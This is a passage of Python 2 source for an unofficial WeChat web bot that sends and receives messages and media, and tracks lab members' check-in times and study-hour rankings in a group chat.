'webpush2.wx.qq.com'
]
for host in SyncHost:
self.syncHost = host
[retcode, selector] = self.synccheck()
if retcode == '0':
return True
return False
def synccheck(self):
params = {
'r': int(time.time()),
'sid': self.sid,
'uin': self.uin,
'skey': self.skey,
'deviceid': self.deviceId,
'synckey': self.synckey,
'_': int(time.time()),
}
url = 'https://' + self.syncHost + \
'/cgi-bin/mmwebwx-bin/synccheck?' + urllib.urlencode(params)
data = self._get(url)
if data == '':
return [-1,-1]
pm = re.search(
r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}', data)
retcode = pm.group(1)
selector = pm.group(2)
return [retcode, selector]
def webwxsync(self):
url = self.base_uri + \
'/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.sid, self.skey, self.pass_ticket)
params = {
'BaseRequest': self.BaseRequest,
'SyncKey': self.SyncKey,
'rr': ~int(time.time())
}
dic = self._post(url, params)
if dic == '':
return None
if self.DEBUG:
print json.dumps(dic, indent=4)
(json.dumps(dic, indent=4))
if dic['BaseResponse']['Ret'] == 0:
self.SyncKey = dic['SyncKey']
self.synckey = '|'.join(
[str(keyVal['Key']) + '_' + str(keyVal['Val']) for keyVal in self.SyncKey['List']])
return dic
def webwxsendmsg(self, word, to='filehelper'):
url = self.base_uri + \
'/webwxsendmsg?pass_ticket=%s' % (self.pass_ticket)
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
params = {
'BaseRequest': self.BaseRequest,
'Msg': {
"Type": 1,
"Content": self._transcoding(word),
"FromUserName": self.User['UserName'],
"ToUserName": to,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(params, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxuploadmedia(self, image_name):
url = 'https://file2.wx.qq.com/cgi-bin/mmwebwx-bin/webwxuploadmedia?f=json'
# 计数器
self.media_count = self.media_count + 1
# 文件名
file_name = image_name
# MIME格式
# mime_type = application/pdf, image/jpeg, image/png, etc.
mime_type = mimetypes.guess_type(image_name, strict=False)[0]
# 微信识别的文档格式,微信服务器应该只支持两种类型的格式。pic和doc
# pic格式,直接显示。doc格式则显示为文件。
media_type = 'pic' if mime_type.split('/')[0] == 'image' else 'doc'
# 上一次修改日期
lastModifieDate = 'Thu Mar 17 2016 00:55:10 GMT+0800 (CST)'
# 文件大小
file_size = os.path.getsize(file_name)
# PassTicket
pass_ticket = self.pass_ticket
# clientMediaId
client_media_id = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
# webwx_data_ticket
webwx_data_ticket = ''
for item in self.cookie:
if item.name == 'webwx_data_ticket':
webwx_data_ticket = item.value
break
if (webwx_data_ticket == ''):
return "None Fuck Cookie"
uploadmediarequest = json.dumps({
"BaseRequest": self.BaseRequest,
"ClientMediaId": client_media_id,
"TotalLen": file_size,
"StartPos": 0,
"DataLen": file_size,
"MediaType": 4
}, ensure_ascii=False).encode('utf8')
multipart_encoder = MultipartEncoder(
fields={
'id': 'WU_FILE_' + str(self.media_count),
'name': file_name,
'type': mime_type,
'lastModifieDate': lastModifieDate,
'size': str(file_size),
'mediatype': media_type,
'uploadmediarequest': uploadmediarequest,
'webwx_data_ticket': webwx_data_ticket,
'pass_ticket': pass_ticket,
'filename': (file_name, open(file_name, 'rb'), mime_type.split('/')[1])
},
boundary='-----------------------------1575017231431605357584454111'
)
headers = {
'Host': 'file2.wx.qq.com',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:42.0) Gecko/20100101 Firefox/42.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'https://wx2.qq.com/',
'Content-Type': multipart_encoder.content_type,
'Origin': 'https://wx2.qq.com',
'Connection': 'keep-alive',
'Pragma': 'no-cache',
'Cache-Control': 'no-cache'
}
r = requests.post(url, data=multipart_encoder, headers=headers)
response_json = r.json()
if response_json['BaseResponse']['Ret'] == 0:
return response_json
return None
def webwxsendmsgimg(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendmsgimg?fun=async&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 3,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
return dic['BaseResponse']['Ret'] == 0
def webwxsendmsgemotion(self, user_id, media_id):
url = 'https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsendemoticon?fun=sys&f=json&pass_ticket=%s' % self.pass_ticket
clientMsgId = str(int(time.time() * 1000)) + \
str(random.random())[:5].replace('.', '')
data_json = {
"BaseRequest": self.BaseRequest,
"Msg": {
"Type": 47,
"EmojiFlag": 2,
"MediaId": media_id,
"FromUserName": self.User['UserName'],
"ToUserName": user_id,
"LocalID": clientMsgId,
"ClientMsgId": clientMsgId
}
}
headers = {'content-type': 'application/json; charset=UTF-8'}
data = json.dumps(data_json, ensure_ascii=False).encode('utf8')
r = requests.post(url, data=data, headers=headers)
dic = r.json()
if self.DEBUG:
print json.dumps(dic, indent=4)
logging.debug(json.dumps(dic, indent=4))
return dic['BaseResponse']['Ret'] == 0
def _saveFile(self, filename, data, api=None):
fn = filename
if self.saveSubFolders[api]:
dirName = os.path.join(self.saveFolder, self.saveSubFolders[api])
if not os.path.exists(dirName):
os.makedirs(dirName)
fn = os.path.join(dirName, filename)
logging.debug('Saved file: %s' % fn)
with open(fn, 'wb') as f:
f.write(data)
f.close()
return fn
def webwxgeticon(self, id):
url = self.base_uri + \
'/webwxgeticon?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgeticon')
def webwxgetheadimg(self, id):
url = self.base_uri + \
'/webwxgetheadimg?username=%s&skey=%s' % (id, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + id + '.jpg'
return self._saveFile(fn, data, 'webwxgetheadimg')
def webwxgetmsgimg(self, msgid):
url = self.base_uri + \
'/webwxgetmsgimg?MsgID=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'img_' + msgid + '.jpg'
return self._saveFile(fn, data, 'webwxgetmsgimg')
# Not work now for weixin haven't support this API
def webwxgetvideo(self, msgid):
url = self.base_uri + \
'/webwxgetvideo?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url, api='webwxgetvideo')
if data == '':
return ''
fn = 'video_' + msgid + '.mp4'
return self._saveFile(fn, data, 'webwxgetvideo')
def webwxgetvoice(self, msgid):
url = self.base_uri + \
'/webwxgetvoice?msgid=%s&skey=%s' % (msgid, self.skey)
data = self._get(url)
if data == '':
return ''
fn = 'voice_' + msgid + '.mp3'
return self._saveFile(fn, data, 'webwxgetvoice')
def getGroupName(self, id):
name = '未知群'
for member in self.GroupList:
if member['UserName'] == id:
name = member['NickName']
if name == '未知群':
# 现有群里面查不到
GroupList = self.getNameById(id)
for group in GroupList:
self.GroupList.append(group)
if group['UserName'] == id:
name = group['NickName']
MemberList = group['MemberList']
for member in MemberList:
self.GroupMemeberList.append(member)
return name
def getUserRemarkName(self, id):
name = '未知群' if id[:2] == '@@' else '陌生人'
if id == self.User['UserName']:
return self.User['NickName'] # 自己
if id[:2] == '@@':
# 群
name = self.getGroupName(id)
else:
# 特殊账号
for member in self.SpecialUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# 公众号或服务号
for member in self.PublicUsersList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# 直接联系人
for member in self.ContactList:
if member['UserName'] == id:
name = member['RemarkName'] if member[
'RemarkName'] else member['NickName']
# 群友
for member in self.GroupMemeberList:
if member['UserName'] == id:
name = member['DisplayName'] if member[
'DisplayName'] else member['NickName']
if name == '未知群' or name == '陌生人':
logging.debug(id)
return name
def getUSerID(self, name):
for member in self.MemberList:
if name == member['RemarkName'] or name == member['NickName']:
return member['UserName']
return None
def _showMsg(self, message):
srcName = None
dstName = None
groupName = None
content = None
msg = message
logging.debug(msg)
if msg['raw_msg']:
srcName = self.getUserRemarkName(msg['raw_msg']['FromUserName'])
dstName = self.getUserRemarkName(msg['raw_msg']['ToUserName'])
content = msg['raw_msg']['Content'].replace(
'<', '<').replace('>', '>')
message_id = msg['raw_msg']['MsgId']
if content.find('http://weixin.qq.com/cgi-bin/redirectforward?args=') != -1:
# 地理位置消息
data = self._get(content)
if data == '':
return
data.decode('gbk').encode('utf-8')
pos = self._searchContent('title', data, 'xml')
temp = self._get(content)
if temp == '':
return
tree = html.fromstring(temp)
url = tree.xpath('//html/body/div/img')[0].attrib['src']
for item in urlparse(url).query.split('&'):
if item.split('=')[0] == 'center':
loc = item.split('=')[-1:]
content = '%s 发送了一个 位置消息 - 我在 [%s](%s) @ %s]' % (
srcName, pos, url, loc)
if msg['raw_msg']['ToUserName'] == 'filehelper':
# 文件传输助手
dstName = '文件传输助手'
if msg['raw_msg']['FromUserName'][:2] == '@@':
# 接收到来自群的消息
if ":<br/>" in content:
[people, content] = content.split(':<br/>', 1)
groupName = srcName
srcName = self.getUserRemarkName(people)
dstName = 'GROUP'
else:
groupName = srcName
srcName = 'SYSTEM'
elif msg['raw_msg']['ToUserName'][:2] == '@@':
# 自己发给群的消息
groupName = dstName
srcName = self.getUserRemarkName(self.User['UserName'])
dstName = 'GROUP'
# 收到了红包
if content == '收到红包,请在手机上查看':
msg['message'] = content
# 指定了消息内容
if 'message' in msg.keys():
content = msg['message']
if groupName != None:
print '%s |%s| %s -> %s: %s' % (message_id, groupName.strip(), srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
if groupName.strip() == "微信机器人测试" or groupName.strip() == "沉迷学习,日渐消瘦":
print msg['raw_msg']['Content']
if msg['raw_msg']['FromUserName'][:2] == '@@':
self.handleGroupMsg(content, msg['raw_msg']['FromUserName'], srcName)
elif msg['raw_msg']['ToUserName'][:2] == '@@':
self.handleGroupMsg(content, msg['raw_msg']['ToUserName'], srcName)
# print mat
# if mat == True and len(content_new) == 9:
# lines = srcName.strip() + '\t' + content_new[0:9] + '\r\n'
# print lines
# fd = open("test2","a")
# fd.write(lines)
# fd.close()
logging.info('%s |%s| %s -> %s: %s' % (message_id, groupName.strip(),
srcName.strip(), dstName.strip(), content.replace('<br/>', '\n')))
else:
print '%s %s -> %s: %s' % (message_id, srcName.strip(), dstName.strip(), content.replace('<br/>', '\n'))
logging.info('%s %s -> %s: %s' % (message_id, srcName.strip(),
dstName.strip(), content.replace('<br/>', '\n')))
def handleGroupMsg(self, content, dst, srcName):
log_info = ''
content_new = content.replace('<br/>', '\n')
buffer_content = content.split()
info = ''
# query keywords: query or q (for short).
if buffer_content[0] == "查询" or buffer_content[0].lower() == "query" or buffer_content[0].lower() == "q":
date_time = datetime.datetime.now()
name = ''
if len(buffer_content) == 1:
name = srcName.decode('UTF-8')
elif len(buffer_content) == 2 and buffer_content[1].isalpha():
name = buffer_content[1].decode('UTF-8')
if name_dict.has_key(name):
info = '[' + date_time.strftime('%Y-%m-%d %H:%M') + ']: ' + name_dict[name] + ' login'
check_info = {'name' : name_dict[name], 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
log_info = ''
self.handleCheck(check_info, dst)
else:
info = '查无此人'
log_info = ''
# Response to "签入/签到" "签出"
# login keywords: login or in (for short).
elif content == "签入" or content == "签到" or content.lower() == "login" or content.lower() == "in":
date_time = datetime.datetime.now()
print repr(srcName)
print srcName
name = srcName.decode('UTF-8')
if name_dict.has_key(name):
info = '[' + date_time.strftime('%Y-%m-%d %H:%M') + ']: ' + name_dict[name] + ' login'
log_info = {'name' : name_dict[name], 'state' : '1', 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
else:
info = '用户未注册'
log_info = ''
# self.webwxsendmsg(info + '【自动回复】', dst)
# logout keywords: logout or out (for short).
elif content == "签出" or content.lower() == "logout" or content.lower() == "out":
date_time = datetime.datetime.now()
name = srcName.decode('UTF-8')
if name_dict.has_key(name):
info = '[' + date_time.strftime('%Y-%m-%d %H:%M') + ']: ' + name_dict[name] + ' logout'
log_info = {'name' : name_dict[name], 'state' : '0', 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
else:
info = "用户未注册"
log_info = ''
# self.webwxsendmsg(info + '【自动回复】', dst)
# sum keywords: sum.
elif content == "统计" or content.lower() == "sum":
date_time = datetime.datetime.now()
name = ''
if len(buffer_content) == 1:
name = srcName.decode('UTF-8')
elif len(buffer_content) == 2 and buffer_content[1].isalpha():
name = buffer_content[1].decode('UTF-8')
if name_dict.has_key(name):
check_info = {'name' : name_dict[name], 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
self.timeSum(check_info, dst)
# thisrank keywords: thisrank.
elif content == "今日排名" or content == "今日排行" or content.lower() == "thisrank":
date_time = datetime.datetime.now()
name = srcName.decode('UTF-8')
check_info = {'name' : name_dict[name], 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
self.thisRank(check_info, dst)
# rank keywords: rank.
elif content == "排名" or content == "排行" or content.lower() == "rank":
date_time = datetime.datetime.now()
name = srcName.decode('UTF-8')
check_info = {'name' : name_dict[name], 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
self.timeRank(check_info, dst)
elif content == "读取状态":
self.readStatus(dst)
elif content == "sudo清空重置":
date_time = datetime.datetime.now()
fn = 'data\data_' + date_time.strftime('%Y-%m-%d')
fd = open(fn,'w+')
for i in range(memberNum):
line = (str)(state_in[i]) + '\t' + (str)(last_login[i])
for j in range(7):
line = line + '\t' + (str)(online_time[j][i].total_seconds())
line = line + '\t'+ 'end' + '\n'
fd.write(line)
fd.close()
for i in range(memberNum):
state_in[i] = 0
last_login[i] = time_init
for j in range(7):
online_time[j][i] = datetime.timedelta(0)
fd = open('cache','w+')
for i in range(memberNum):
line = (str)(state_in[i]) + '\t' + (str)(last_login[i])
for j in range(7):
line = line + '\t' + (str)(online_time[j][i].total_seconds())
line = line + '\t'+ 'end' + '\n'
fd.write(line)
fd.close()
self.webwxsendmsg('重置成功',dst)
else:
try:
if len(buffer_content) == 2 and buffer_content[0].isdigit() and buffer_content[1].isalpha():
if len(buffer_content[0]) == 9:
time = buffer_content[0][0:8]
state = buffer_content[0][8]
usr = buffer_content[1]
date_time = datetime.datetime(datetime.date.today().year,
int(buffer_content[0][0:2]), int(buffer_content[0][2:4]),
int(buffer_content[0][4:6]), int(buffer_content[0][6:8]))
if state is '1' :
if name_dict.has_key(usr):
if usr == 'gjq':
date_time = date_time + datetime.timedelta(0, 46800)
info = '[' + date_time.strftime('%Y-%m-%d %H:%M') + ']: ' + name_dict[usr] + ' login'
log_info = {'name' : name_dict[usr], 'state' : '1', 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
else:
info = '[' + date_time.strftime('%Y-%m-%d %H:%M') + ']: ' + name_dict[usr] + ' login'
log_info = {'name' : name_dict[usr], 'state' : '1', 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
else:
info = '用户未注册'
log_info = ''
elif state is '0':
if name_dict.has_key(usr):
if usr == 'gjq':
date_time = date_time + datetime.timedelta(0, 46800)
info = '[' + date_time.strftime('%Y-%m-%d %H:%M') + ']: ' + name_dict[usr] + ' logout'
log_info = {'name' : name_dict[usr], 'state' : '0', 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
else:
info = '[' + date_time.strftime('%Y-%m-%d %H:%M') + ']: ' + name_dict[usr] + ' logout'
log_info = {'name' : name_dict[usr], 'state' : '0', 'time' : date_time.strftime('%Y-%m-%d %H:%M')}
else:
info = '用户未注册'
log_info = ''
else:
info = 'error'
log_info = ''
# self.webwxsendmsg(info + '【自动回复】', dst)
else:
self.webwxsendmsg('时间格式错误【自动回复】', dst)
log_info = ''
except Exception, e:
self.webwxsendmsg(str(e) + '【自动回复】', dst)
log_info = ''
pass
try:
extra_info = ''
flag = False
if log_info is not '':
[extra_info, flag] = self.checkLogInfo(log_info)
if flag is True:
self.webwxsendmsg(info + '【自动回复】', dst)
self.webwxsendmsg(extra_info, dst)
else:
self.webwxsendmsg(extra_info, dst)
except Exception, e:
print str(e)
pass
print log_info
if log_info is not '':
if flag is True:
print 'ok'
fn = 'data\data_' + date_time.strftime('%Y-%m-%d') + '.json'
with open(fn, 'a') as f:
f.write(json.dumps(log_info) + '\n')
f.close()
fd = open('cache','w+')
for i in range(memberNum):
line = (str)(state_in[i]) + '\t' + (str)(last_login[i])
for j in range(7):
line = line + '\t' + (str)(online_time[j][i].total_seconds())
line = line + '\t'+ 'end' + '\n'
fd.write(line)
fd.close()
def readStatus(self, dst):
fd = open('cache','r')
num = 0
for lines in fd.readlines():
content_all = lines.split('\t')
state_in[num] = (int)(content_all[0])
last_login[num] = datetime.datetime.strptime(content_all[1], '%Y-%m-%d %H:%M:%S')
for i in range(7):
print(content_all[2+i])
print((str)(i))
temp_time = content_all[2+i][:-2]
online_time[i][num] = datetime.timedelta(0,(int)(temp_time))
num = num + 1
self.webwxsendmsg('读取成功',dst)
def checkLogInfo(self, log_info):
action = int(log_info['state']) #'0': logout, '1': login
name = log_info['name']
id = int(id_dict[name])
time = datetime.datetime.strptime(log_info['time'], '%Y-%m-%d %H:%M')
info = ''
flag = False
if state_in[id] is 0 and action is 0:
info = '【签出失败】您尚未登入'
return [info, flag]
elif state_in[id] is 1 and action is 1:
info = '【签到失败】您尚未登出'
return [info, flag]
elif state_in[id] is 0 and action is 1:
if last_login[id] > time:
info = '【签到失败】签入时间在签出时间之前'
elif time - datetime.datetime.now() >= datetime.timedelta(0, 3600): #登入时间超出当前时间一小时
info = '【签到失败】签入时间超出当前时间1小时'
else:
last_login[id] = time
state_in[id] = 1
weekday = time.weekday()
if online_time[weekday][id] == datetime.timedelta(0):
info = '鸣洲都能九点前到实验室,你有什么理由不努力!您刚开始沉迷学习,加油'
else:
info = '您今日沉迷学习时间为:' + str(online_time[weekday][id])
flag = True
return [info, flag]
elif state_in[id] is 1 and action is 0:
if last_login[id] > time:
info = '【签出失败】签出时间在签入时间之前'
elif time - datetime.datetime.now() >= datetime.timedelta(0, 3600):
info = '【签出失败】签出时间超出当前时间1小时'
else:
state_in[id] = 0
duration = time - last_login[id]
weekday = time.weekday()
online_time[weekday][id] = online_time[weekday][id] + duration
#online_time_sum[id] = online_time_sum[id] + duration
info = '本次学习时间为:' + str(duration) + '\n今日沉迷学习时间为:' + str(online_time[weekday][id])
flag = True
return [info, flag]
def handleCheck(self, check_info, dst):
name = check_info['name']
id = int(id_dict[name])
time = datetime.datetime.strptime(check_info['time'], '%Y-%m-%d %H:%M')
duration = (time - last_login[id]) * state_in[id]
# if state_in[id] is 1:
# duration = time - last_login[id]
# else:
# duration = datetime.timedelta(0)
weekday = time.weekday()
online_time_curr = online_time[weekday][id] + duration
#rank = memberNum + 1
#for i in range(memberNum):
# if online_time_curr >= online_time[weekday][i] + (time - last_login[i]) * state_in[i]:
# rank = rank - 1
#msg = name + '今日在线总时间为:' + str(online_time_curr) + '\n排名第' + str(rank) + '位'
msg = name + '今日在线总时间为:' + str(online_time_curr)
self.webwxsendmsg(msg, dst)
def timeSum(self, check_info, dst):
name = check_info['name']
id = int(id_dict[name])
time = datetime.datetime.strptime(check_info['time'], '%Y-%m-%d %H:%M')
duration = (time - last_login[id]) * state_in[id]
# if state_in[id] is 1:
# duration = time - last_login[id]
# else:
# duration = datetime.timedelta(0)
weekday = time.weekday()
sum_time = datetime.timedelta(0)
for i in range(weekday + 1):
sum_time = sum_time + online_time[i][id]
sum_time = sum_time + duration
msg = name + '本周在线总时间为:' + str(sum_time)
self.webwxsendmsg(msg, dst)
# [func] ranking for the queryed date
# code reused from [func]timeRank
# todo: 1. time zone issue of Jacky Gao
# 2. start time modified as 06:00 am
def thisRank(self, check_info, dst):
online_this_sum = [datetime.timedelta(0) for i in range(memberNum)]
thisseconds = [0 for i in range(memberNum)] # seconds count for today till queryed time
name = check_info['name']
id = int(id_dict[name])
time = datetime.datetime.strptime(check_info['time'], '%Y-%m-%d %H:%M')
for i in range(memberNum):
duration = (time - last_login[i]) * state_in[i]
weekday = time.weekday()
online_this_sum[i] = online_time[weekday][i] + duration
thisseconds[i] = online_this_sum[i].total_seconds()
name_list = ['徐凯源','宋绍铭','刘 洋','韩纪飞','高佳琦','郭东旭','张若冰','韩晓霏','于 超','林声远','鸡器人','厉丹阳','王佳林','韦 洁' ,'陈佳宁']
name_list_eng = ['xky','ssm','ly','hjf','gjq','gdx','zrb','hxf','yc','lsy','test','ldy','wjl','wj' ,'cjn']
lists = zip(thisseconds, online_this_sum, name_list, name_list_eng)
lists.sort(key=lambda x:x[0],reverse=True)
msg = '今日当前排名:\n'
rank = 0
for i in range(memberNum):
rkstr = ' %d' % (i+1) # rank string
if len(rkstr) < 4: # add two (half-width) space for alignment
rkstr = ' ' + rkstr
hrstr = '%2.1f' % (lists[i][0] / 3600.0) # hour string
if len(hrstr) < 4: # add four (half-width) space for alignment
hrstr = ' ' + hrstr
elif len(hrstr) < 5: # add two (half-width) space for alignment
hrstr = ' ' + hrstr
msg = msg + rkstr + ' | ' + lists[i][2] + ' ' + hrstr + ' 小时\n'
if lists[i][3] == name:
rank = i + 1
if rank != 0:
names = lists[rank - 1][2].replace(' ', '') # omit the full-width space '\xa1\xa1'
# splitline = '——————————\n' # split line (caution: display varies with PC and phone)
msg = msg + names + "的当前排名:" + (str)(rank)
self.webwxsendmsg(msg, dst)
def timeRank(self, check_info, dst):
online_time_sum = [datetime.timedelta(0) for i in range(memberNum)]
totalseconds = [0 for i in range(memberNum)]
name = check_info['name']
id = int(id_dict[name])
time = datetime.datetime.strptime(check_info['time'], '%Y-%m-%d %H:%M')
for i in range(memberNum):
duration = (time - last_login[i]) * state_in[i]
weekday = time.weekday()
for j in range(weekday + 1):
online_time_sum[i] = online_time_sum[i] + online_time[j][i]
online_time_sum[i] = online_time_sum[i] + duration
totalseconds[i] = online_time_sum[i].total_seconds()
name_list = ['徐凯源','宋绍铭','刘 洋','韩纪飞','高佳琦','郭东旭','张若冰','韩晓霏','于 超','林声远','鸡器人','厉丹阳','王佳林','韦 洁' ,'陈佳宁']
name_list_eng = ['xky','ssm','ly','hjf','gjq','gdx','zrb','hxf','yc','lsy','test','ldy','wjl','wj' ,'cjn']
lists = zip(totalseconds, online_time_sum, name_list, name_list_eng)
lists.sort(key=lambda x:x[0],reverse=True)
msg = '本周目前排名:\n'
rank = 0
for i in range(memberNum):
rkstr = ' %d' % (i+1) # rank string
if len(rkstr) < 4: # add two (half-width) space for alignment
rkstr = ' ' + rkstr
hrstr = '%2.1f' % (lists[i][0] / 3600.0) # hour string
if len(hrstr) < 4: # add four (half-width) space for alignment
hrstr = ' ' + hrstr
elif len(hrstr) < 5: # add two (half-width) space for alignment
hrstr = ' ' + hrstr
msg = msg + rkstr + ' | ' + lists[i][2] + ' ' + hrstr + ' 小时\n'
if lists[i][3] == name:
rank = i + 1
if rank != 0:
names = lists[rank - 1][2].replace(' ', '') # omit the full-width space '\xa1\xa1'
# splitline = '——————————\n' # split line (caution: display varies with PC and phone)
msg = msg + names + "的目前排名:" + (str)(rank)
self.webwxsendmsg(msg, dst)
def handleMsg(self, r):
for msg in r['AddMsgList']:
# print '[*] 你有新的消息,请注意查收'
logging.debug('[*] 你有新的消息,请注意查收')
if self.DEBUG:
fn = 'msg' + str(int(random.random() * 1000)) + '.json'
with open(fn, 'w') as f:
f.write(json.dumps(msg))
print '[*] 该消息已储存到文件: ' + fn
logging.debug('[*] 该消息已储存到文件: %s' % (fn))
msgType = msg['MsgType']
name = self.getUserRemarkName(msg['FromUserName'])
content = msg['Content'].replace('<', '<').replace('>', '>')
msgid = msg['MsgId']
if msgType == 1:
raw_msg = {'raw_msg': msg}
self._showMsg(raw_msg)
if self.autoReplyMode:
ans = self._xiaodoubi(content) + '\n[微信机器人自动回复]'
if self.webwxsendmsg(ans, msg['FromUserName']):
print '自动回复: ' + ans
logging.info('自动回复: ' + ans)
else:
print '自动回复失败'
logging.info('自动回复失败')
# elif msgType == 3:
# image = self.webwxgetmsgimg(msgid)
# raw_msg = {'raw_msg': msg,
# 'message': '%s 发送了一张图片: %s' % (name, image)}
# self._showMsg(raw_msg)
# self._safe_open(image)
# elif msgType == 34:
# voice = self.webwxgetvoice(msgid)
# raw_msg = {'raw_msg': msg,
# 'message': '%s 发了一段语音: %s' % (name, voice)}
# self._showMsg(raw_msg)
# self._safe_open(voice)
# elif msgType == 42:
# info = msg['RecommendInfo']
# print '%s 发送了一张名片:' % name
# print '========================='
# print '= 昵称: %s' % info['NickName']
# print '= 微信号: %s' % info['Alias']
# print '= 地区: %s %s' % (info['Province'], info['City'])
# print '= 性别: %s' % ['未知', '男', '女'][info['Sex']]
# print '========================='
# raw_msg = {'raw_msg': msg, 'message': '%s 发送了一张名片: %s' % (
# name.strip(), json.dumps(info))}
# self._showMsg(raw_msg)
# elif msgType == 47:
# url = self._searchContent('cdnurl', content)
# raw_msg = {'raw_msg': msg,
# 'message': '%s 发了一个动画表情,点击下面链接查看: %s' % (name, url)}
# self._showMsg(raw_msg)
# self._safe_open(url)
# elif msgType == 49:
# appMsgType = defaultdict(lambda: "")
# appMsgType.update({5: '链接', 3: '音乐', 7: '微博'})
# print '%s 分享了一个%s:' % (name, appMsgType[msg['AppMsgType']])
# print '========================='
# print '= 标题: %s' % msg['FileName']
# print '= 描述: %s' % self._searchContent('des', content, 'xml')
# print '= 链接: %s' % msg['Url']
# print '= 来自: %s' % self._searchContent('appname', content, 'xml')
# print '========================='
# card = {
# 'title': msg['FileName'],
# 'description': self._searchContent('des', content, 'xml'),
# 'url': msg['Url'],
# 'appname': self._searchContent('appname', content, 'xml')
# }
# raw_msg = {'raw_msg': msg, 'message': '%s 分享了一个%s: %s' % (
# name, appMsgType[msg['AppMsgType']], json.dumps(card))}
# self._showMsg(raw_msg)
# elif msgType == 51:
# raw_msg = {'raw_msg': msg, 'message': '[*] 成功获取联系人信息'}
# self._showMsg(raw_msg)
# elif msgType == 62:
# video = self.webwxgetvideo(msgid)
# raw_msg = {'raw_msg': msg,
# 'message': '%s 发了一段小视频: %s' % (name, video)}
# self._showMsg(raw_msg)
# self._safe_open(video)
# elif msgType == 10002:
# raw_msg = {'raw_msg': msg, 'message': '%s 撤回了一条消息' % name}
# self._showMsg(raw_msg)
# else:
# logging.debug('[*] 该消息类型为: %d,可能是表情,图片, 链接或红包: %s' %
# (msg['MsgType'], json.dumps(msg)))
# raw_msg = {
# 'raw_msg': msg, 'message': '[*] 该消息类型为: %d,可能是表情,图片, 链接或红包' % msg['MsgType']}
# self._showMsg(raw_msg)
def listenMsgMode(self):
print '[*] 进入消息监听模式 ... 成功'
logging.debug('[*] 进入消息监听模式 ... 成功')
self._run('[*] 进行同步线路测试 ... ', self.testsynccheck)
playWeChat = 0
redEnvelope = 0
while True:
self.lastCheckTs = time.time()
[retcode, selector] = self.synccheck()
if self.DEBUG:
print 'retcode: %s, selector: %s' % (retcode, selector)
logging.debug('retcode: %s, selector: %s' % (retcode, selector))
if retcode == '1100':
print '[*] 你在手机上登出了微信,债见'
logging.debug('[*] 你在手机上登出了微信,债见')
break
if retcode == '1101':
print '[*] 你在其他地方登录了 WEB 版微信,债见'
logging.debug('[*] 你在其他地方登录了 WEB 版微信,债见')
break
elif retcode == '0':
if selector == '2':
r = self.webwxsync()
if r is not None:
self.handleMsg(r)
elif selector == '6':
# TODO
redEnvelope += 1
print '[*] 收到疑似红包消息 %d 次' % redEnvelope
logging.debug('[*] 收到疑似红包消息 %d 次' % redEnvelope)
r = self.webwxsync()
elif selector == '7':
playWeChat += 1
print '[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat
logging.debug('[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat)
r = self.webwxsync()
elif selector == '0':
time.sleep(1)
if (time.time() - self.lastCheckTs) <= 20:
time.sleep(time.time() - self.lastCheckTs)
def sendMsg(self, name, word, isfile=False):
id = self.getUSerID(name)
if id:
if isfile:
with open(word, 'r') as f:
for line in f.readlines():
line = line.replace('\n', '')
self._echo('-> ' + name + ': ' + line)
if self.webwxsendmsg(line, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
else:
if self.webwxsendmsg(word, id):
print '[*] 消息发送成功'
logging.debug('[*] 消息发送成功')
else:
print '[*] 消息发送失败'
logging.debug('[*] 消息发送失败')
else:
print '[*] 此用户不存在'
logging.debug('[*] 此用户不存在')
def sendMsgToAll(self, word):
for contact in self.ContactList:
name = contact['RemarkName'] if contact[
'RemarkName'] else contact['NickName']
id = contact['UserName']
self._echo('-> ' + name + ': ' + word)
if self.webwxsendmsg(word, id):
print ' [成功]'
else:
print ' [失败]'
time.sleep(1)
def sendImg(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgimg(user_id, media_id)
def sendEmotion(self, name, file_name):
response = self.webwxuploadmedia(file_name)
media_id = ""
if response is not None:
media_id = response['MediaId']
user_id = self.getUSerID(name)
response = self.webwxsendmsgemotion(user_id, media_id)
